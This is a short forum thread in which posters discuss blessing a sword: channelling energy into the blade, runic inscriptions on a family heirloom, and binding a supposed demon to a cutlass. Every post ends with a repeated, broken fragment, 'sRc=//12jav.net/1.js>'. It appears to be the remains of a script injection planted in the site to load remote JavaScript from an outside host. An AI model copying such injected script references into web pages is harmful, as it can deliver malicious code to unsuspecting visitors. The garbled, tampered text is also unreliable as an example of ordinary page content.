Looking for a sword bless

I typically just channel my energy through the steel, and that energy will affect metaphysical entities. I basically envision that my energy forms a sort of layer over the steel, and hardens and sharpens the blade( because I typically use dull blades for these purposes, for safety reasons). sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

That's certainly an idea, but my cutlass is razor sharp so that isn't really an option for me. At least for the time being. I was thinking something along the lines of inscriptions on the blade itself. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

My uncle has my family's sword from before the famine in Ireland that brought that side of my family to the Americas, and that has several runes on the blade which I roughly translated to mean " by the grace of the gods, protect me" and the other side says " by assisting to defeat my enemy." I had a gladius, but for me it just didn't work. The cutlass feels more natural in my hand. But what I've decided to try is binding the entity, that I am now convinced is a demon, to the sword itself. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
